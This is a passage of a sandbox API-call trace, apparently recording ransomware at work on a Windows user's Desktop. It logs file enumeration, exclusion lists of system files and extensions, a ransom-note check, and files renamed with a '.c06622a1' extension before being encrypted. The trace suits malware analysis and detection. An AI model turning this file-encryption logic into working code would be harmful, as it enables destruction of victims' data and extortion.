"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6_2e p3mgy.swf.c06622a1"), dwFlags=0x8) returned 1 [0147.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6_2e p3MGy.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6_2e p3mgy.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x634 [0147.539] CreateIoCompletionPort (FileHandle=0x634, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.539] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0147.545] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x56b32f35 [0147.545] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xe02fa00 [0147.545] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x70d8d377 [0147.545] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5f1da977 [0147.545] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4901db26 [0147.545] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xaf956cf [0147.545] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x51779883 [0147.545] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a0e979b [0147.548] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x7077aaaa [0147.548] RtlComputeCrc32 (PartialCrc=0xaaaa, Buffer=0x2f30094, Length=0x80) returned 0x8760a2b5 [0147.548] RtlComputeCrc32 (PartialCrc=0xa2b5, Buffer=0x2f30094, Length=0x80) returned 0x1d5c2d31 [0147.548] RtlComputeCrc32 (PartialCrc=0x2d31, Buffer=0x2f30094, Length=0x80) returned 0x692dc87f [0147.548] RtlComputeCrc32 (PartialCrc=0xc87f, Buffer=0x2f30094, Length=0x80) returned 0xf37bf18f [0147.548] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0147.548] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.548] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.548] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3eca620, ftCreationTime.dwHighDateTime=0x1d5e6fe, ftLastAccessTime.dwLowDateTime=0x387a3fa0, ftLastAccessTime.dwHighDateTime=0x1d5d840, ftLastWriteTime.dwLowDateTime=0x387a3fa0, ftLastWriteTime.dwHighDateTime=0x1d5d840, nFileSizeHigh=0x0, nFileSizeLow=0xec38, dwReserved0=0x0, dwReserved1=0x0, cFileName="8d2NxlEedg.avi", cAlternateFileName="8D2NXL~1.AVI")) returned 1 [0147.548] _wcsicmp (_Str1="8d2NxlEedg.avi", _Str2="README.c06622a1.TXT") returned -58 [0147.548] wcsstr (_Str="8d2NxlEedg.avi", _SubStr="README") returned 0x0 [0147.548] _wcsicmp (_Str1="autorun.inf", _Str2="8d2NxlEedg.avi") returned 41 [0147.548] wcslen (_String="autorun.inf") returned 0xb [0147.548] _wcsicmp (_Str1="boot.ini", _Str2="8d2NxlEedg.avi") returned 42 [0147.548] wcslen (_String="boot.ini") returned 0x8 [0147.548] _wcsicmp (_Str1="bootfont.bin", _Str2="8d2NxlEedg.avi") returned 42 [0147.548] wcslen (_String="bootfont.bin") returned 0xc [0147.548] _wcsicmp (_Str1="bootsect.bak", _Str2="8d2NxlEedg.avi") returned 42 [0147.549] wcslen (_String="bootsect.bak") returned 0xc [0147.549] _wcsicmp (_Str1="desktop.ini", _Str2="8d2NxlEedg.avi") returned 44 [0147.549] wcslen (_String="desktop.ini") returned 0xb [0147.549] _wcsicmp (_Str1="iconcache.db", _Str2="8d2NxlEedg.avi") returned 49 [0147.549] wcslen (_String="iconcache.db") returned 0xc [0147.549] _wcsicmp (_Str1="ntldr", _Str2="8d2NxlEedg.avi") returned 54 [0147.549] wcslen (_String="ntldr") returned 0x5 [0147.549] _wcsicmp (_Str1="ntuser.dat", _Str2="8d2NxlEedg.avi") returned 54 [0147.549] wcslen (_String="ntuser.dat") returned 0xa [0147.549] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8d2NxlEedg.avi") returned 54 [0147.549] wcslen (_String="ntuser.dat.log") returned 0xe [0147.549] _wcsicmp (_Str1="ntuser.ini", _Str2="8d2NxlEedg.avi") returned 54 [0147.549] wcslen (_String="ntuser.ini") returned 0xa [0147.549] _wcsicmp (_Str1="thumbs.db", _Str2="8d2NxlEedg.avi") returned 60 [0147.549] wcslen (_String="thumbs.db") returned 0x9 [0147.549] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0147.549] wcslen (_String="386") returned 0x3 [0147.549] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0147.549] wcslen (_String="adv") returned 0x3 [0147.549] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0147.549] wcslen (_String="ani") returned 0x3 [0147.549] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0147.549] wcslen (_String="bat") returned 0x3 [0147.549] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0147.549] wcslen (_String="bin") returned 0x3 [0147.549] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0147.549] wcslen (_String="cab") returned 0x3 [0147.549] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0147.549] wcslen (_String="cmd") returned 0x3 [0147.549] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0147.549] wcslen (_String="com") returned 0x3 [0147.549] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0147.549] wcslen (_String="cpl") returned 0x3 [0147.550] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0147.550] wcslen (_String="cur") returned 0x3 [0147.550] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0147.550] wcslen (_String="deskthemepack") returned 0xd [0147.550] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0147.550] wcslen (_String="diagcab") returned 0x7 [0147.550] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0147.550] wcslen (_String="diagcfg") returned 0x7 [0147.550] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0147.550] wcslen (_String="diagpkg") returned 0x7 [0147.550] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0147.550] wcslen (_String="dll") returned 0x3 [0147.550] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0147.550] wcslen (_String="drv") returned 0x3 [0147.550] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0147.550] wcslen (_String="exe") returned 0x3 [0147.550] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0147.550] wcslen (_String="hlp") returned 0x3 [0147.550] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0147.550] wcslen (_String="icl") returned 0x3 [0147.550] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0147.550] wcslen (_String="icns") returned 0x4 [0147.550] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0147.550] wcslen (_String="ico") returned 0x3 [0147.550] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0147.550] wcslen (_String="ics") returned 0x3 [0147.550] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0147.550] wcslen (_String="idx") returned 0x3 [0147.550] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0147.550] wcslen (_String="ldf") returned 0x3 [0147.550] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0147.550] wcslen (_String="lnk") returned 0x3 [0147.550] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0147.550] wcslen (_String="mod") returned 0x3 [0147.551] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0147.551] wcslen (_String="mpa") returned 0x3 [0147.551] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0147.551] wcslen (_String="msc") returned 0x3 [0147.551] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0147.551] wcslen (_String="msp") returned 0x3 [0147.551] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0147.551] wcslen (_String="msstyles") returned 0x8 [0147.551] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0147.551] wcslen (_String="msu") returned 0x3 [0147.551] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0147.551] wcslen (_String="nls") returned 0x3 [0147.551] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0147.551] wcslen (_String="nomedia") returned 0x7 [0147.551] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0147.551] wcslen (_String="ocx") returned 0x3 [0147.551] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0147.551] wcslen (_String="prf") returned 0x3 [0147.551] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0147.551] wcslen (_String="ps1") returned 0x3 [0147.551] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0147.551] wcslen (_String="rom") returned 0x3 [0147.551] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0147.551] wcslen (_String="rtp") returned 0x3 [0147.551] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0147.551] wcslen (_String="scr") returned 0x3 [0147.551] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0147.551] wcslen (_String="shs") returned 0x3 [0147.551] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0147.551] wcslen (_String="spl") returned 0x3 [0147.551] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0147.551] wcslen (_String="sys") returned 0x3 [0147.551] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0147.552] wcslen (_String="theme") returned 0x5 [0147.552] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0147.552] wcslen (_String="themepack") returned 0x9 [0147.552] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0147.552] wcslen (_String="wpx") returned 0x3 [0147.552] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0147.552] wcslen (_String="lock") returned 0x4 [0147.552] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0147.552] wcslen (_String="key") returned 0x3 [0147.552] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0147.552] wcslen (_String="hta") returned 0x3 [0147.552] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0147.552] wcslen (_String="msi") returned 0x3 [0147.552] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0147.552] wcslen (_String="pdb") returned 0x3 [0147.552] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0147.552] wcslen (_String="sql") returned 0x3 [0147.552] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0147.552] wcslen (_String="sqlite") returned 0x6 [0147.552] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.552] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.552] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.552] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.552] wcscpy (in: _Dest=0x44d00cc, _Source="8d2NxlEedg.avi" | out: _Dest="8d2NxlEedg.avi") returned="8d2NxlEedg.avi" [0147.552] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8d2NxlEedg.avi", dwFileAttributes=0x80) returned 1 [0147.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8d2NxlEedg.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8d2nxleedg.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x660 [0147.553] SetFilePointerEx (in: hFile=0x660, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.553] ReadFile (in: hFile=0x660, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.553] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xa20ee706 [0147.553] RtlComputeCrc32 (PartialCrc=0xe706, Buffer=0x3feb74, Length=0x80) returned 0xedd6d3ca [0147.554] RtlComputeCrc32 (PartialCrc=0xd3ca, Buffer=0x3feb74, Length=0x80) returned 0xff78f438 [0147.554] RtlComputeCrc32 (PartialCrc=0xf438, Buffer=0x3feb74, Length=0x80) returned 0x3419cacf [0147.554] RtlComputeCrc32 (PartialCrc=0xcacf, Buffer=0x3feb74, Length=0x80) returned 0x417763dd [0147.554] CloseHandle (hObject=0x660) returned 1 [0147.554] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.554] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8d2NxlEedg.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8d2NxlEedg.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8d2NxlEedg.avi" [0147.554] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8d2NxlEedg.avi") returned 0x38 [0147.554] wcscpy (in: _Dest=0x44e00f0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.554] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8d2NxlEedg.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8d2nxleedg.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8d2NxlEedg.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8d2nxleedg.avi.c06622a1"), dwFlags=0x8) returned 1 [0147.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8d2NxlEedg.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8d2nxleedg.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x660 [0147.556] CreateIoCompletionPort (FileHandle=0x660, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.556] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0147.562] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x551e5780 [0147.562] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x47c7d2c3 [0147.562] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x54eefd47 [0147.562] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x472c3048 [0147.562] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x318ae0fb [0147.562] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5df43935 [0147.562] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3529e1d9 [0147.562] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3174e419 [0147.565] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0x4f13324 [0147.565] RtlComputeCrc32 (PartialCrc=0x3324, Buffer=0x4280094, Length=0x80) returned 0xd2de86bd [0147.565] RtlComputeCrc32 (PartialCrc=0x86bd, Buffer=0x4280094, Length=0x80) returned 0x8d011bdc [0147.565] RtlComputeCrc32 (PartialCrc=0x1bdc, Buffer=0x4280094, Length=0x80) returned 0x8882f959 [0147.565] RtlComputeCrc32 (PartialCrc=0xf959, Buffer=0x4280094, Length=0x80) returned 0x7bc61b50 [0147.565] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0147.565] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.565] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.565] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36f97d50, ftCreationTime.dwHighDateTime=0x1d5e257, ftLastAccessTime.dwLowDateTime=0x4e588340, ftLastAccessTime.dwHighDateTime=0x1d5e065, ftLastWriteTime.dwLowDateTime=0x4e588340, ftLastWriteTime.dwHighDateTime=0x1d5e065, nFileSizeHigh=0x0, nFileSizeLow=0x5e02, dwReserved0=0x0, dwReserved1=0x0, cFileName="9STobsEsIlXi_C.gif", cAlternateFileName="9STOBS~1.GIF")) returned 1 [0147.566] _wcsicmp (_Str1="9STobsEsIlXi_C.gif", _Str2="README.c06622a1.TXT") returned -57 [0147.566] wcsstr (_Str="9STobsEsIlXi_C.gif", _SubStr="README") returned 0x0 [0147.566] _wcsicmp (_Str1="autorun.inf", _Str2="9STobsEsIlXi_C.gif") returned 40 [0147.566] wcslen (_String="autorun.inf") returned 0xb [0147.566] _wcsicmp (_Str1="boot.ini", _Str2="9STobsEsIlXi_C.gif") returned 41 [0147.566] wcslen (_String="boot.ini") returned 0x8 [0147.566] _wcsicmp (_Str1="bootfont.bin", _Str2="9STobsEsIlXi_C.gif") returned 41 [0147.566] wcslen (_String="bootfont.bin") returned 0xc [0147.566] _wcsicmp (_Str1="bootsect.bak", _Str2="9STobsEsIlXi_C.gif") returned 41 [0147.566] wcslen (_String="bootsect.bak") returned 0xc [0147.566] _wcsicmp (_Str1="desktop.ini", _Str2="9STobsEsIlXi_C.gif") returned 43 [0147.566] wcslen (_String="desktop.ini") returned 0xb [0147.566] _wcsicmp (_Str1="iconcache.db", _Str2="9STobsEsIlXi_C.gif") returned 48 [0147.566] wcslen (_String="iconcache.db") returned 0xc [0147.566] _wcsicmp (_Str1="ntldr", _Str2="9STobsEsIlXi_C.gif") returned 53 [0147.566] wcslen (_String="ntldr") returned 0x5 [0147.566] _wcsicmp (_Str1="ntuser.dat", _Str2="9STobsEsIlXi_C.gif") returned 53 [0147.566] wcslen (_String="ntuser.dat") returned 0xa [0147.566] _wcsicmp (_Str1="ntuser.dat.log", _Str2="9STobsEsIlXi_C.gif") returned 53 [0147.566] wcslen (_String="ntuser.dat.log") returned 0xe [0147.566] _wcsicmp (_Str1="ntuser.ini", _Str2="9STobsEsIlXi_C.gif") returned 53 [0147.566] wcslen (_String="ntuser.ini") returned 0xa [0147.566] _wcsicmp (_Str1="thumbs.db", _Str2="9STobsEsIlXi_C.gif") returned 59 [0147.566] wcslen (_String="thumbs.db") returned 0x9 [0147.566] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0147.566] wcslen (_String="386") returned 0x3 [0147.566] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0147.566] wcslen (_String="adv") returned 0x3 [0147.566] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0147.566] wcslen (_String="ani") returned 0x3 [0147.566] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0147.566] wcslen (_String="bat") returned 0x3 [0147.567] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0147.567] wcslen (_String="bin") returned 0x3 [0147.567] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0147.567] wcslen (_String="cab") returned 0x3 [0147.567] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0147.567] wcslen (_String="cmd") returned 0x3 [0147.567] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0147.567] wcslen (_String="com") returned 0x3 [0147.567] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0147.567] wcslen (_String="cpl") returned 0x3 [0147.567] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0147.567] wcslen (_String="cur") returned 0x3 [0147.567] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0147.567] wcslen (_String="deskthemepack") returned 0xd [0147.567] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0147.567] wcslen (_String="diagcab") returned 0x7 [0147.567] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0147.567] wcslen (_String="diagcfg") returned 0x7 [0147.567] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0147.567] wcslen (_String="diagpkg") returned 0x7 [0147.567] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0147.567] wcslen (_String="dll") returned 0x3 [0147.567] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0147.567] wcslen (_String="drv") returned 0x3 [0147.567] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0147.567] wcslen (_String="exe") returned 0x3 [0147.567] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0147.567] wcslen (_String="hlp") returned 0x3 [0147.567] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0147.567] wcslen (_String="icl") returned 0x3 [0147.567] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0147.567] wcslen (_String="icns") returned 0x4 [0147.567] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0147.567] wcslen (_String="ico") returned 0x3 [0147.568] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0147.568] wcslen (_String="ics") returned 0x3 [0147.568] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0147.568] wcslen (_String="idx") returned 0x3 [0147.568] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0147.568] wcslen (_String="ldf") returned 0x3 [0147.568] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0147.568] wcslen (_String="lnk") returned 0x3 [0147.568] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0147.568] wcslen (_String="mod") returned 0x3 [0147.568] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0147.568] wcslen (_String="mpa") returned 0x3 [0147.568] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0147.568] wcslen (_String="msc") returned 0x3 [0147.568] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0147.568] wcslen (_String="msp") returned 0x3 [0147.568] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0147.568] wcslen (_String="msstyles") returned 0x8 [0147.568] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0147.568] wcslen (_String="msu") returned 0x3 [0147.568] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0147.568] wcslen (_String="nls") returned 0x3 [0147.568] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0147.568] wcslen (_String="nomedia") returned 0x7 [0147.568] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0147.568] wcslen (_String="ocx") returned 0x3 [0147.568] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0147.568] wcslen (_String="prf") returned 0x3 [0147.568] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0147.568] wcslen (_String="ps1") returned 0x3 [0147.568] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0147.568] wcslen (_String="rom") returned 0x3 [0147.568] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0147.569] wcslen (_String="rtp") returned 0x3 [0147.569] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0147.569] wcslen (_String="scr") returned 0x3 [0147.569] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0147.569] wcslen (_String="shs") returned 0x3 [0147.569] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0147.569] wcslen (_String="spl") returned 0x3 [0147.569] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0147.569] wcslen (_String="sys") returned 0x3 [0147.569] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0147.569] wcslen (_String="theme") returned 0x5 [0147.569] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0147.569] wcslen (_String="themepack") returned 0x9 [0147.569] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0147.569] wcslen (_String="wpx") returned 0x3 [0147.569] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0147.569] wcslen (_String="lock") returned 0x4 [0147.569] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0147.569] wcslen (_String="key") returned 0x3 [0147.569] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0147.569] wcslen (_String="hta") returned 0x3 [0147.569] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0147.569] wcslen (_String="msi") returned 0x3 [0147.569] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0147.569] wcslen (_String="pdb") returned 0x3 [0147.569] _wcsicmp (_Str1="sql", _Str2="gif") returned 12 [0147.569] wcslen (_String="sql") returned 0x3 [0147.569] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0147.569] wcslen (_String="sqlite") returned 0x6 [0147.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.570] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.570] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.570] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.570] wcscpy (in: _Dest=0x44d00cc, _Source="9STobsEsIlXi_C.gif" | out: _Dest="9STobsEsIlXi_C.gif") returned="9STobsEsIlXi_C.gif" [0147.570] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9STobsEsIlXi_C.gif", dwFileAttributes=0x80) returned 1 [0147.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9STobsEsIlXi_C.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9stobsesilxi_c.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0147.570] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.570] ReadFile (in: hFile=0x644, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.571] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xaad077ee [0147.571] RtlComputeCrc32 (PartialCrc=0x77ee, Buffer=0x3feb74, Length=0x80) returned 0x5721c14a [0147.571] RtlComputeCrc32 (PartialCrc=0xc14a, Buffer=0x3feb74, Length=0x80) returned 0x43df4059 [0147.571] RtlComputeCrc32 (PartialCrc=0x4059, Buffer=0x3feb74, Length=0x80) returned 0xb8a42c79 [0147.571] RtlComputeCrc32 (PartialCrc=0x2c79, Buffer=0x3feb74, Length=0x80) returned 0x82f1d584 [0147.571] CloseHandle (hObject=0x644) returned 1 [0147.571] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.571] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9STobsEsIlXi_C.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS 